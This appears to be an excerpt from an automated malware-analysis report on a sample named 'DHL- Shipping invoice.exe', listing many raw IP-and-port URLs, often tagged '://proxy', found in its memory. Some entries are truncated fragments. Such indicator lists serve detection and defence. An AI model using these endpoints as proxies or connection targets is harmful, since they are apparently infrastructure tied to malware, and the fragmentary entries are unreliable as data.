                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.210.113.32:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.176.57:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.176.57:3129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.177.38:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.177.38:3129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.180.149:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.180.149:3129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.183.188:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.183.188:3129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.235.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.235.172:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.219.235.172:3129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.235.104.105:3729
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.235.104.105:3729://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.24.43.21
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.24.43.214:8123
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.24.43.214:8123://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.37.207.8:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.37.207.8:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.42.119.47
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.42.119.47://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.42.119.47:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.188.17:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.188.17:3129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.190.150:3129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.44.190.150:3129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://20.80.103.193:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.106.124.10:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.106.124.10:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.190.110:9800
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.190.110:9800://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.197.2:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.197.2:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.108.197.2:8080p
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.111.232.94:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.111.232.94:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.174.198.95:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.19.177.120
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.19.177.120://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.19.177.120:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.24.130.138:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.24.130.138:9998
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.24.130.138:999://proxyx
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.25.254.193:54240
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.25.254.193:54240://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.35.49.5
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.35.49.57:42541
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.35.49.57:42541://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.39.154.1:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.39.154.1:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.41.148.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.41.148.2:12
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.41.148.2:12000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.41.148.2:12000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980B7B000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.41.170.211:11201
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.41.170.211:11201://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.52.148.10:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.52.148.10:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.54.194.13:53281
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.54.194.13:53281://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.54.22.74:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.54.22.74:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.55.249.135:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.55.249.135:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.58.74.6:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.59.10.49:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.59.10.49:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9803AA000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.69.67.148:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.69.67.148:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.7.8
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.7.8.74:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.7.8.74:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.80.227.234:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.80.227.234:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.85.34.174:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.85.34.174:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.91.251.180:3629://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.95.184.58:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.95.184.58:9998
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://200.95.184.58:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.148.32.162
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.148.32.162://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.148.32.162:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.149.127.22:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.149.127.22:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9822C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.152.35.7:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.170.180.188:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.170.180.188:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.184.176.106:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.184.176.106:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.118.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.118.146:27234
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.118.146:27234://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.67.70:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.67.70:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.88.5:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.88.5:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.94.93:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.20.94.93:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.217.246.212:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.217.246.212:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.218.144.19:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.218.144.19:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.219.201.14:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.219.201.14:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.219.201.14:999H
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.220.112.98:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.220.112.98:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9813B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.221.134.74:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9813C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.221.134.74:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.249.152
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.249.152.172:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.249.152.172:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.251.155.253:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.251.155.253:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98218A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.2.115:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.2.115:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.2.177:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.2.177:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.52:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.56:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.56:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.61:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.62:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.71.3.62:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.108.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.108.64:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.108.64:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.110.1:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.77.110.1:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.91.82.155:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://201.91.82.155:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.12.80.14:82
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.12.80.14:82://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981434000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.124.43.249:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98142F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.124.43.249:4145://proxy0k
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.131.65.110
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.131.65.110://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.131.65.110:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.137.24.19:7890
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.137.24.19:7890://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.138.248
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.138.248.107:1212
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.138.248.107:1212://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.139.198.15:3060
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.139.198.15:3060://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982083000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.144.134.150:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.144.134.150:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.150.134.202:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9802FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.150.134.202:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980109000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98037E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.150.151.138:4995
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.150.151.138:4995://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.151.163.10:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.151.163.10:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.152.51.44:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.152.51.44:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.159.35.153:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.159.35.153:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.159.60.65:443
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.159.60.65:443://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.162.105.202:8000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.162.105.202:8000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.162.219.10:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.162.219.10:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.164.194.41:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.164.194.41:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.179.188.178:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.179.188.178:8080://proxy
